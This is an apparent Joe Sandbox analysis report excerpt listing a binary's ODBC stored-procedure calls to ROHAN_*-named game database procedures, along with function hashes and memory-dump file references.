                                                                                      • String ID: {? = CALL [ROHAN_GetTCharacterUI] (?,?,?,?,?)}
                                                                                      • API String ID: 0-2369720846
                                                                                      • Opcode ID: 4a0a7005288dd1adc6bbfec051a17a195ebb6ac65453ce2f1ab8af521ac4f053
                                                                                      • Instruction ID: 46c86c05e5864f111906bd73296e14abaace2385502da9170c727297f1c639ce
                                                                                      • Opcode Fuzzy Hash: 4a0a7005288dd1adc6bbfec051a17a195ebb6ac65453ce2f1ab8af521ac4f053
                                                                                      • Instruction Fuzzy Hash: E941E370644218B7EB648B54CC52FD973B8FF44714F20C294F7546E2C5DD7169828BD8
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_TakeAttachedItem](?, ?, ?, ?, ?)},000000FD), ref: 0043F432
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043F47D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043F4B5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043F4EA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043F522
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043F55A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043F592
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_TakeAttachedItem](?, ?, ?, ?, ?)}, xrefs: 0043F429
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_TakeAttachedItem](?, ?, ?, ?, ?)}
                                                                                      • API String ID: 0-3931410329
                                                                                      • Opcode ID: 2d76c703b8b037339419120d9e255ef953af83617c129b91e22ef5b60970663d
                                                                                      • Instruction ID: 6984c4daf2999592318bf58aaa57c9b67dd051f09ccf977d6fb0cd42565c3f9c
                                                                                      • Opcode Fuzzy Hash: 2d76c703b8b037339419120d9e255ef953af83617c129b91e22ef5b60970663d
                                                                                      • Instruction Fuzzy Hash: 0C4102756482157BEB68CB54CC92FE97378EB44F18F208388F7196E2C5D7B16D808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_Levelup](?, ?, ?, ?, ?)},000000FD), ref: 0042C02F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042C06E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042C0A3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042C0DB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C113
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C14B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C183
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_Levelup](?, ?, ?, ?, ?)}, xrefs: 0042C026
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_Levelup](?, ?, ?, ?, ?)}
                                                                                      • API String ID: 0-3347584380
                                                                                      • Opcode ID: 8945c1279c7ce2bc33f89854a8adc1038ee898be14911993dab56e5a46036344
                                                                                      • Instruction ID: 8709763eecf8fe0797b9f952ce94007c680e04ed5b1be268d3ccc442abce4ef1
                                                                                      • Opcode Fuzzy Hash: 8945c1279c7ce2bc33f89854a8adc1038ee898be14911993dab56e5a46036344
                                                                                      • Instruction Fuzzy Hash: 4E41E1F1A443147BEF248F54CD52FAA7378EB85B18F104288F7146E2C6E6B26980CB5D
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_SaveAffectSkill] (?, ?, ?, ?, ?)},000000FD), ref: 0042E1C1
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042E200
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042E235
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042E26D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042E2A5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042E2DD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042E315
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_SaveAffectSkill] (?, ?, ?, ?, ?)}, xrefs: 0042E1B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_SaveAffectSkill] (?, ?, ?, ?, ?)}
                                                                                      • API String ID: 0-2826769423
                                                                                      • Opcode ID: 573ca95c51d9d05570cfa76098affc439c186688c756f718314d9036f11c54c6
                                                                                      • Instruction ID: 9f55b1ad21f23885691507b1c1fba60b9e4d08ae0d9b9d21de59ac0717139715
                                                                                      • Opcode Fuzzy Hash: 573ca95c51d9d05570cfa76098affc439c186688c756f718314d9036f11c54c6
                                                                                      • Instruction Fuzzy Hash: 294100B0A417157FFB249B54CC62FAB7374EB84B1AF2082C8F6186E2C5D5B16D408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_UpdateTItemHonorPvPpoint] (?, ?, ?, ?, ?)},000000FD), ref: 0043C7B6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043C7F5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043C82A
                                                                                      • #72.ODBC32(?,00000000,00000001,00000005,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043C862
                                                                                      • #72.ODBC32(?,00000000,00000001,00000005,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000005,00000005,00000000), ref: 0043C89A
                                                                                      • #72.ODBC32(?,00000000,00000001,00000005,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000005,00000005,00000000), ref: 0043C8D2
                                                                                      • #72.ODBC32(?,00000000,00000001,00000005,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000005,00000005,00000000), ref: 0043C90A
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_UpdateTItemHonorPvPpoint] (?, ?, ?, ?, ?)}, xrefs: 0043C7AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_UpdateTItemHonorPvPpoint] (?, ?, ?, ?, ?)}
                                                                                      • API String ID: 0-4072066093
                                                                                      • Opcode ID: 20ff4a8067be9bda18133198fafca691fd79817403c2c5d1b3a4f4985583385c
                                                                                      • Instruction ID: 2953467067e15712a3fa072c97b3d7afb408219ecc5c74d0e30f52ab0931e79d
                                                                                      • Opcode Fuzzy Hash: 20ff4a8067be9bda18133198fafca691fd79817403c2c5d1b3a4f4985583385c
                                                                                      • Instruction Fuzzy Hash: 10413270B802167BEB748B44CC56FBA7336EB84B08F10819AF7087E6C1D6B16D819F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetNGuildWarKillInfo] (?,?,?,?,?)},000000FD), ref: 00434AFF
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00434B3E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00434B73
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00434BAB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00434BE3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00434C1B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00434C53
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetNGuildWarKillInfo] (?,?,?,?,?)}, xrefs: 00434AF6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetNGuildWarKillInfo] (?,?,?,?,?)}
                                                                                      • API String ID: 0-801146960
                                                                                      • Opcode ID: b9a09609c6d3705d6a45ce8dc3358ab9be75a55ec3b7a749a19c7061604b5475
                                                                                      • Instruction ID: 1c888faf965b1e3733a93d7bdc551df330de4fe5a3153a32e5bfa1f758faed6f
                                                                                      • Opcode Fuzzy Hash: b9a09609c6d3705d6a45ce8dc3358ab9be75a55ec3b7a749a19c7061604b5475
                                                                                      • Instruction Fuzzy Hash: 2B415271B413157BFB249B44CC52FAA7334EB85B24F158289F719BE6C1D2B16D408F09
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetUserCharacterMoney](?,?,?,?,?)},000000FD), ref: 0043C197
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043C1D9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043C20E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043C246
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043C27E
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000E7,000000FB,00000000), ref: 0043C2B6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000E7,000000FB,00000000), ref: 0043C2EE
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetUserCharacterMoney](?,?,?,?,?)}, xrefs: 0043C18E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
